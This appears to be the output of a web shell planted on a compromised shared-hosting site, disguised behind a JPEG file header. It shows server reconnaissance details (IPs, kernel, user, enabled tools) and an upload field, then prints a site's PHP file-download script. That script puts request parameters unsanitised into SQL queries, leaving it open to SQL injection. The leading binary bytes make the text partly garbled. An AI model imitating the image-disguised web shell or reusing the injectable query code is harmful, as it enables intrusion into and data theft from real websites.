����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 3.16.50.1 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/malawisounds.com/ |
Upload File : |
<?php include'connect.php'; error_reporting(0); set_time_limit(0); include'core.php'; if(isset($_GET['id']) && isset($_GET['date'])) { $id = $_GET['id']; $date=$_GET['date']; if($date>time()) { $sqli="SELECT `file`,`downloads` FROM `tbl_uploads` WHERE `id`='$id'"; if($sql_run=mysqli_query($conn,$sqli)) { if(list($file,$downloads)=mysqli_fetch_array($sql_run)) { $increment=++$downloads; $Sqli2="UPDATE `tbl_uploads` SET `downloads`='$increment' WHERE `id`='$id'"; $sql2_run=mysqli_query($conn,$Sqli2); $query = "SELECT `file`,`type`,`normal_size` FROM `tbl_uploads` WHERE id=$id"; if($result = mysqli_query($conn,$query)) { list($name,$type,$size)=mysqli_fetch_array($result); header("content-Description: File Transfer"); header("content-type:application:octet-stream;"); header("Content-Disposition: attachment; filename=$name"); header("Content-Transfer-Encoding: binary"); header("Connection: Keep-Alive"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0"); header("Content-length: $size"); header("pragma: public"); readfile('uploads/'.$name); exit(); } } } } else { ?> <h3><center>DOWNLOAD LINK HAS EXPIRED</center></h3> <?php } } ?>